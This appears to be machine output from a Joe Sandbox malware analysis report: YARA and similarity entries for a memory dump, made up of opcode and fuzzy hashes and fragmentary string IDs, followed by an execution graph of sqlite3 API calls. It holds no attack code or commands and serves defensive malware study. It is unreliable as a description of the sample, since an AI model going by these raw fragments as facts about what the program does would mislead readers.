                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: XT
                                                                                                  • API String ID: 0-1606242382
                                                                                                  • Opcode ID: 67f4f5d27cb569a14e811ea4c5a8c679ae83f84f9d716903cf4240c840fcb08b
                                                                                                  • Instruction ID: 0f539753338c568fdf3cfbbacfed486c7b06476e4a766aaa40d759fbcbcdad46
                                                                                                  • Opcode Fuzzy Hash: 67f4f5d27cb569a14e811ea4c5a8c679ae83f84f9d716903cf4240c840fcb08b
                                                                                                  • Instruction Fuzzy Hash: 651142B2D0121DAF9B00DFA9D8409EFB7F9FF48214F14416AE915E7200F770AA048BA1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dae69ab5ca1d9182f792529412a64e8b27143a2411fcea6ba5fbd9cb2b66894e
                                                                                                  • Instruction ID: de567c4a6836854746cdc3de7e896a662c2bbe6668b51b92e063d4c56a75e0f8
                                                                                                  • Opcode Fuzzy Hash: dae69ab5ca1d9182f792529412a64e8b27143a2411fcea6ba5fbd9cb2b66894e
                                                                                                  • Instruction Fuzzy Hash: 97414FB1D11218AFDB14DF99CC84AEEBBBDFF49710F10415AFA04E6240E7B0A641CBA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e0525f01588e0980575d949100cdf498856ec3317efb96ac66230ce24626402d
                                                                                                  • Instruction ID: 104641942322d39d25dc4def329472521a5fd4f12d6757146073c269dbb84367
                                                                                                  • Opcode Fuzzy Hash: e0525f01588e0980575d949100cdf498856ec3317efb96ac66230ce24626402d
                                                                                                  • Instruction Fuzzy Hash: 9F31D8B5A00648AFDB14DF98C880EDEB7B9EF8D314F108219FD08A7340E770A951CBA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1a19d67413e03ccd299f593aa1bdc07c3198b698cb7db928bcd3febee0e0798e
                                                                                                  • Instruction ID: 53971c7fb34092e8b5c0ecdd3d4257f49ea53749876e22e1d6106768d3c5db9d
                                                                                                  • Opcode Fuzzy Hash: 1a19d67413e03ccd299f593aa1bdc07c3198b698cb7db928bcd3febee0e0798e
                                                                                                  • Instruction Fuzzy Hash: EF311AB5A00648AFDB14DF98CC41EEF77B9EF89304F108119FD08AB240E770A951CBA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 39afbcede6fb44affe79b86406fda2f8e9b21315bb83ed72aa0f73e125c1c7b0
                                                                                                  • Instruction ID: cc3c4cf2767db10c6a03c66e5669bf75fc8387f13e5403a26faa617796a8f134
                                                                                                  • Opcode Fuzzy Hash: 39afbcede6fb44affe79b86406fda2f8e9b21315bb83ed72aa0f73e125c1c7b0
                                                                                                  • Instruction Fuzzy Hash: E72119B5A00709ABEB14DF98DC41EEF77B8EF89310F108509F918AB240E770A951CBA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7ae600028ef5d616cbada1f6c2f50b77b38e5eeee70724e629ea44efaa84e6e1
                                                                                                  • Instruction ID: 1bbc1290d5e103356ef58de82e50e0e5d1075817cfa641134286553889f75464
                                                                                                  • Opcode Fuzzy Hash: 7ae600028ef5d616cbada1f6c2f50b77b38e5eeee70724e629ea44efaa84e6e1
                                                                                                  • Instruction Fuzzy Hash: F111C6B23802147BF7309E559C42FAB335C9B95B14F244019FB04AA2C1E6E4F8114BB8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a840b1fe716a396293f7e2edb3f4b5af22fa3951aa5333b0456081457e479bd
                                                                                                  • Instruction ID: fac8842c5d6a13b5b8c03f8bd58addff6aeed5e97cec91357f419a62344b8dba
                                                                                                  • Opcode Fuzzy Hash: 5a840b1fe716a396293f7e2edb3f4b5af22fa3951aa5333b0456081457e479bd
                                                                                                  • Instruction Fuzzy Hash: 1A114C71A01704BBE710EF68DC41FAB77B8EB89714F04454AF908AB280E770B951CBA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                  • API String ID: 0-3248090998
                                                                                                  Strings
                                                                                                  • API ID:
                                                                                                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                  • API String ID: 0-1002149817
                                                                                                  Strings
                                                                                                  • API ID:
                                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                  • API String ID: 0-392141074
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                  • API String ID: 0-392141074
                                                                                                  • Opcode ID: 2f791f9defee8460e7e66ec439dfeaeae0c879a99208495f02405192927e5abc
                                                                                                  • Instruction ID: b2f1abe1f0db9c76abce2c2cb769f2ec198ed21f267b2f1a6a6145e3074cfc72
                                                                                                  • Opcode Fuzzy Hash: 2f791f9defee8460e7e66ec439dfeaeae0c879a99208495f02405192927e5abc
                                                                                                  • Instruction Fuzzy Hash: 4C6122B1C00328AAEB61DF94CC50FDEB778AF54704F4085D9E50DAA180FBB46B888F55
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                  • API String ID: 0-685823316
                                                                                                  • Opcode ID: 36e0108c31f08321ca762368f2d0b8bbaeb85c298a1a19bc502e6c1a8aa6e65e
                                                                                                  • Instruction ID: 650980a07cc38b2d2c32f74411448d819a4842c3502d186dd53326f9b040b588
                                                                                                  • Opcode Fuzzy Hash: 36e0108c31f08321ca762368f2d0b8bbaeb85c298a1a19bc502e6c1a8aa6e65e
                                                                                                  • Instruction Fuzzy Hash: 8331B6B1D01218BAEF10DFA4CC45BEEBBB9BF04704F00815DE6087B180EBB516488FA4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$P$e$i$m$o$r$x
                                                                                                  • API String ID: 0-620024284
                                                                                                  • Opcode ID: 3f3a663253f3d607156336e8a584d54e1ddcdc1462f5c7090b81b0de8b115336
                                                                                                  • Instruction ID: 159617d51b4901be033ecbd038bf821b3a7b95f10dae7dcecf4b9d94f25bc6f0
                                                                                                  • Opcode Fuzzy Hash: 3f3a663253f3d607156336e8a584d54e1ddcdc1462f5c7090b81b0de8b115336
                                                                                                  • Instruction Fuzzy Hash: 964193B5D00228B6EB20EBA0DD41FEF7378AF54704F0085DDA509A7140FAB5A7898FA5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: L$S$\$a$c$e$l
                                                                                                  • API String ID: 0-3322591375
                                                                                                  • Opcode ID: 2b561b82ae07efc7f262c25c406e04e38491dce5583aab4ae65b8faaa5537e7c
                                                                                                  • Instruction ID: 8e5bf9561085e1239e4736b8ec9ab4e0456967642bca4a954bcaa356acfae0b0
                                                                                                  • Opcode Fuzzy Hash: 2b561b82ae07efc7f262c25c406e04e38491dce5583aab4ae65b8faaa5537e7c
                                                                                                  • Instruction Fuzzy Hash: 734174B2C11628AADB50DF94DC84BEEB7B8FF58314F05459ED909A7200F77066858F94
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "$&$0$^$k$l$s
                                                                                                  • API String ID: 0-3955182176
                                                                                                  • Opcode ID: c044bd9cbc13fcd2b0c071f3b13ed233c22e04fae2f32790d11bb063a30f6f88
                                                                                                  • Instruction ID: c60f13f23925c028846bae963c0c782a48c597ddcf4a77461a233caad7609a1b
                                                                                                  • Opcode Fuzzy Hash: c044bd9cbc13fcd2b0c071f3b13ed233c22e04fae2f32790d11bb063a30f6f88
                                                                                                  • Instruction Fuzzy Hash: 5611DE10D087CED9DB22CBBC88082AEBF711F23224F0887D9D5F02B2D6D275434697A6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: F$P$T$f$r$x
                                                                                                  • API String ID: 0-2523166886
                                                                                                  • Opcode ID: ce75db93e8005f08445aedec2c296d2568d215f592c2c83bd09247c8ef7fedce
                                                                                                  • Instruction ID: ebc0cef16f10b9c53ff528896ae1bdfcaa4ef5c3a6178275ba78d2efee3fd8f3
                                                                                                  • Opcode Fuzzy Hash: ce75db93e8005f08445aedec2c296d2568d215f592c2c83bd09247c8ef7fedce
                                                                                                  • Instruction Fuzzy Hash: 3B510470A00714ABEB34DF64CD44BEAB7B8BF54704F04499DE5096A290F7B4B584CFA5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $i$l$o$u
                                                                                                  • API String ID: 0-2051669658
                                                                                                  • Opcode ID: bfb84598a9054895757775ab3ab190b066a55e01d5a13464680932e09410dfe1
                                                                                                  • Instruction ID: 4e11b376b136655a138a8f2092884ae85ffd51dc2b4d51ac68a5bbcd7d1ae548
                                                                                                  • Opcode Fuzzy Hash: bfb84598a9054895757775ab3ab190b066a55e01d5a13464680932e09410dfe1
                                                                                                  • Instruction Fuzzy Hash: 5F613EB1A00304AFDB24DFA4CC80FEFB7B8AF89710F14455DE65AA7240E775BA418B60
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $i$l$o$u
                                                                                                  • API String ID: 0-2051669658
                                                                                                  • Opcode ID: b0a0e90a1a9712c2c9924f8973c087b8fa3180785f4c20b59259edc613e2aa9b
                                                                                                  • Instruction ID: 665f920eab540a5cab47aefaff8c7b31e0a40d23bfdf109bd621276797e64c2e
                                                                                                  • Opcode Fuzzy Hash: b0a0e90a1a9712c2c9924f8973c087b8fa3180785f4c20b59259edc613e2aa9b
                                                                                                  • Instruction Fuzzy Hash: FD413DB1A00358AFDB20DFA4CC84FEFB7F9AF89704F14455DE659A7240E774AA418B60
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  • Opcode ID: 2336c26278b3ae8fab14e7781892457724e43eff2f51f08ef59e66d2ba553e47
                                                                                                  • Instruction ID: 8deb8bdda8bf2be9258f49621a4a161d880c66d2c243e90c262cc20f3c8eb910
                                                                                                  • Opcode Fuzzy Hash: 2336c26278b3ae8fab14e7781892457724e43eff2f51f08ef59e66d2ba553e47
                                                                                                  • Instruction Fuzzy Hash: 1DB13CB5A00708AFDB24CFA4CC84FEFB7B9AF89704F14855DF659A7240E675AA01CB50
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$h$o
                                                                                                  • API String ID: 0-3662636641
                                                                                                  • Opcode ID: 78a4643caae2850f0c3a4963b8e706b55265526d4bedfb8f3727240e96031b29
                                                                                                  • Instruction ID: 037f3d5afee295d05c724b9cdd4432efc75b27134c94671a654f5563958bb985
                                                                                                  • Opcode Fuzzy Hash: 78a4643caae2850f0c3a4963b8e706b55265526d4bedfb8f3727240e96031b29
                                                                                                  • Instruction Fuzzy Hash: A38185B6C012687AEB25DB90CC51FEF737CAF58304F0085DDA509A6044FB746B868FA9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                  • API String ID: 0-2877786613
                                                                                                  • Opcode ID: 32756e4007f5b493cdf90942bc671c35dd93b3a707bbde0dc3da0120e5e13943
                                                                                                  • Instruction ID: f246118a0d60f6e420271cd5cbdd3a4f88131e819d6b9ceddaec092d1f668651
                                                                                                  • Opcode Fuzzy Hash: 32756e4007f5b493cdf90942bc671c35dd93b3a707bbde0dc3da0120e5e13943
                                                                                                  • Instruction Fuzzy Hash: 744171B19116287AE712EF90CC55FFF773CEF65704F004589FA00AA181E7B46A018BEA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$h$o
                                                                                                  • API String ID: 0-3662636641
                                                                                                  • Opcode ID: 1fed353d55d1be69079e6262f14f571558f00ede29407796c35591ef57d3aee2
                                                                                                  • Instruction ID: 5785026ad4cc9b98738cf178d6569b32f32da0a837c7413ec6020d16f3dbac56
                                                                                                  • Opcode Fuzzy Hash: 1fed353d55d1be69079e6262f14f571558f00ede29407796c35591ef57d3aee2
                                                                                                  • Instruction Fuzzy Hash: 684183B1C01368BAEB24DBA0CC51FDEB3BCAF58304F0085DDA109A6144FBB467458FA9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043C0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_10_2_43c0000_mVjlVtpvDsvJ.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $e$k$o
                                                                                                  • API String ID: 0-3624523832
                                                                                                  • Opcode ID: c61f41ef72bd45f35086c109433bb9af5d4552db42473458eafe9c3e69ea8a2b
                                                                                                  • Instruction ID: 28ea92148031ecbece75811445eaaf7a8e7099df5d4f5cae371b028e9c32db78
                                                                                                  • Opcode Fuzzy Hash: c61f41ef72bd45f35086c109433bb9af5d4552db42473458eafe9c3e69ea8a2b
                                                                                                  • Instruction Fuzzy Hash: 7EF012B090030CEBDB14DF85D889BDEBBBAFF09714F008108E5152B241D7B1A545CFA4

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.8%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0.4%
                                                                                                  Total number of Nodes:454
                                                                                                  Total number of Limit Nodes:60
24427->24543 24429 61e8f55f 24430 61e901d9 24429->24430 24431 61e8f58b sqlite3_mutex_enter 24429->24431 24438 61e8f57e sqlite3_free 24429->24438 24432 61e9019c sqlite3_errcode 24430->24432 24546 61e2b996 24431->24546 24434 61e901ab sqlite3_close 24432->24434 24437 61e901b7 24432->24437 24436 61e901c2 sqlite3_free 24434->24436 24436->24426 24437->24436 24438->24430 24439 61e2b996 15 API calls 24440 61e8f6a0 24439->24440 24441 61e2b996 15 API calls 24440->24441 24442 61e8f6c8 24441->24442 24443 61e2b996 15 API calls 24442->24443 24444 61e8f6f0 24443->24444 24445 61e2b996 15 API calls 24444->24445 24446 61e8f718 24445->24446 24447 61e90191 sqlite3_mutex_leave 24446->24447 24557 61e11c6e 24446->24557 24447->24432 24450 61e8f75c 24638 61e38ca4 13 API calls 24450->24638 24451 61e8f750 24637 61e27c83 sqlite3_log 24451->24637 24454 61e8f75a 24455 61e8f781 24454->24455 24456 61e8f7c3 24454->24456 24639 61e2b4a0 11 API calls 24455->24639 24563 61e46abf 24456->24563 24460 61e8f809 24464 61e13056 3 API calls 24460->24464 24461 61e8f7ee 24463 61e0fc18 sqlite3_free 24461->24463 24462 61e8f7b3 sqlite3_free 24462->24447 24465 61e8f804 24463->24465 24466 61e8f814 24464->24466 24465->24447 24623 61e161ff 24466->24623 24468 61e8f821 24469 61e161ff 3 API calls 24468->24469 24470 61e8f84a 24469->24470 24470->24447 24627 61e0fc18 24470->24627 24473 61e8f89f 24474 61e8f8a6 sqlite3_errcode 24473->24474 24475 61e8f8ba 24474->24475 24518 61e8fbc9 24474->24518 24477 61e8fec2 24475->24477 24478 61e8f8c2 sqlite3_malloc 24475->24478 24476 61e8fbec 24476->24477 24483 61e8fca0 sqlite3_create_module 24476->24483 24481 61e8fed4 sqlite3_create_function 24477->24481 24495 61e8fff4 24477->24495 24478->24477 24480 61e8f8dc 24478->24480 24479 61e8fbda sqlite3_errcode 24479->24447 24479->24476 24640 61e27dff 15 API calls 24480->24640 24485 61e8ff1e sqlite3_create_function 24481->24485 24481->24495 24483->24477 24488 61e8fcca sqlite3_malloc 24483->24488 24484 61e900f5 24486 61e90100 24484->24486 24490 
61e0fc18 sqlite3_free 24484->24490 24489 61e8ff68 sqlite3_create_function 24485->24489 24485->24495 24631 61e13552 24486->24631 24487 61e8f927 24487->24476 24491 61e8f931 sqlite3_create_function 24487->24491 24493 61e8fce5 24488->24493 24488->24495 24489->24495 24496 61e8ffae 24489->24496 24490->24486 24491->24476 24497 61e8f97b sqlite3_create_function 24491->24497 24643 61e1af62 8 API calls 24493->24643 24494 61e8fc02 sqlite3_mutex_enter 24494->24518 24495->24484 24500 61e9005c 24495->24500 24505 61e90018 sqlite3_create_function 24495->24505 24647 61e27dff 15 API calls 24496->24647 24497->24476 24502 61e8f9c1 sqlite3_create_function 24497->24502 24498 61e90117 sqlite3_wal_autocheckpoint 24498->24447 24507 61e900bf 24500->24507 24511 61e9006c sqlite3_create_window_function 24500->24511 24502->24476 24509 61e8fa0b 24502->24509 24503 61e8fd1e 24510 61e90172 24503->24510 24644 61e1af62 8 API calls 24503->24644 24504 61e8fc27 sqlite3_mutex_leave 24506 61e8fc75 sqlite3_free 24504->24506 24504->24518 24505->24495 24512 61e8fc89 24506->24512 24506->24518 24507->24484 24520 61e900ca sqlite3_create_module 24507->24520 24508 61e8ffce 24508->24495 24648 61e27dff 15 API calls 24508->24648 24517 61e8fa25 sqlite3_create_function 24509->24517 24528 61e8fa69 24509->24528 24650 61e09fe9 sqlite3_free sqlite3_free sqlite3_free 24510->24650 24511->24500 24512->24479 24514 61e8fd3e 24514->24510 24645 61e1af62 8 API calls 24514->24645 24517->24509 24518->24476 24518->24479 24518->24494 24518->24504 24518->24506 24642 61e2b4a0 11 API calls 24518->24642 24519 61e90181 sqlite3_free 24519->24477 24520->24507 24523 61e8fd5e 24523->24510 24524 61e8fd66 sqlite3_create_function 24523->24524 24524->24510 24525 61e8fdac sqlite3_create_function 24524->24525 24525->24510 24526 61e8fdf2 sqlite3_overload_function 24525->24526 24526->24510 24527 61e8fe14 sqlite3_overload_function 24526->24527 24527->24510 24530 61e8fe36 sqlite3_overload_function 24527->24530 24528->24476 24641 61e27dff 15 API calls 
24528->24641 24530->24510 24532 61e8fe58 sqlite3_overload_function 24530->24532 24531 61e8fb35 24531->24476 24533 61e8fb3f sqlite3_create_function 24531->24533 24532->24510 24534 61e8fe7a sqlite3_overload_function 24532->24534 24533->24477 24535 61e8fb88 sqlite3_create_function 24533->24535 24534->24510 24536 61e8fe9c 24534->24536 24535->24518 24646 61e27dff 15 API calls 24536->24646 24538 61e8feb8 24538->24477 24649 61e27dff 15 API calls 24538->24649 24540 61e90145 24540->24477 24541 61e9014f sqlite3_create_module 24540->24541 24541->24477 24542->24423 24651 61e10775 24543->24651 24547 61e2b9cd 24546->24547 24548 61e11c6e 11 API calls 24547->24548 24549 61e2b9f6 24548->24549 24552 61e2ba5a 24549->24552 24556 61e2b9fc 24549->24556 24550 61e11c6e 11 API calls 24551 61e2ba0f 24550->24551 24553 61e2ba44 24551->24553 24555 61e0fc18 sqlite3_free 24551->24555 24665 61e2b4a0 11 API calls 24552->24665 24553->24439 24555->24553 24556->24550 24558 61e11cfc 24557->24558 24559 61e11c81 24557->24559 24558->24450 24558->24451 24559->24558 24666 61e11acf 10 API calls 24559->24666 24561 61e11ce6 24561->24558 24667 61e0f612 sqlite3_free 24561->24667 24564 61e46ae1 strcmp 24563->24564 24565 61e46b0b 24563->24565 24564->24565 24598 61e46e27 24564->24598 24566 61e11e9d 6 API calls 24565->24566 24565->24598 24573 61e46b6b 24566->24573 24567 61e11e9d 6 API calls 24568 61e46ff4 24567->24568 24570 61e4700c 24568->24570 24571 61e46ffa 24568->24571 24569 61e47777 24569->24460 24569->24461 24588 61e47113 24570->24588 24673 61e0f612 sqlite3_free 24570->24673 24672 61e0f612 sqlite3_free 24571->24672 24573->24569 24581 61e10775 6 API calls 24573->24581 24605 61e46dab 24573->24605 24574 61e11e9d 6 API calls 24582 61e46dc3 24574->24582 24575 61e471dc 24674 61e139cb 15 API calls 24575->24674 24576 61e47007 24580 61e47612 sqlite3_free sqlite3_free 24576->24580 24677 61e469cd 60 API calls 24576->24677 24578 61e4760d 24578->24580 24618 61e475c9 24580->24618 24584 61e46bfe 24581->24584 24582->24578 
24593 61e10775 6 API calls 24582->24593 24582->24598 24586 61e46c14 sqlite3_free 24584->24586 24587 61e46c26 24584->24587 24585 61e4766d sqlite3_mutex_leave 24585->24569 24586->24569 24590 61e46c2f 24587->24590 24596 61e46c60 sqlite3_free sqlite3_free 24587->24596 24588->24575 24589 61e4723f 24588->24589 24591 61e471b3 sqlite3_uri_boolean 24588->24591 24600 61e46f67 24589->24600 24675 61e0ab1c sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_mutex_enter sqlite3_mutex_leave sqlite3_free 24589->24675 24597 61e46c91 sqlite3_mutex_enter 24590->24597 24591->24575 24595 61e471e2 sqlite3_uri_boolean 24591->24595 24613 61e46e8f 24593->24613 24594 61e472e0 sqlite3_free 24594->24600 24595->24575 24596->24569 24668 61e01713 24597->24668 24598->24567 24598->24576 24600->24576 24606 61e014e3 17 API calls 24600->24606 24611 61e47402 24600->24611 24602 61e46cb8 24603 61e46d8e sqlite3_mutex_leave sqlite3_free 24602->24603 24604 61e46ccb strcmp 24602->24604 24610 61e46cfb 24602->24610 24603->24605 24621 61e47523 24603->24621 24604->24602 24605->24574 24606->24611 24607 61e13056 3 API calls 24607->24618 24608 61e46d6c 24608->24603 24609 61e46f5a 24671 61e0f612 sqlite3_free 24609->24671 24610->24608 24615 61e46d30 sqlite3_mutex_leave sqlite3_mutex_leave sqlite3_free sqlite3_free 24610->24615 24611->24576 24622 61e476d6 24611->24622 24676 61e139cb 15 API calls 24611->24676 24613->24576 24613->24598 24613->24609 24670 61e2ab6e sqlite3_log 24613->24670 24615->24569 24616 61e474e8 24616->24576 24616->24621 24616->24622 24618->24569 24618->24585 24619 61e46f48 24619->24598 24619->24609 24620 61e47719 sqlite3_mutex_enter sqlite3_mutex_leave 24620->24622 24621->24607 24622->24576 24622->24620 24624 61e1620e 24623->24624 24626 61e1621a 24623->24626 24625 61e13056 3 API calls 24624->24625 24625->24626 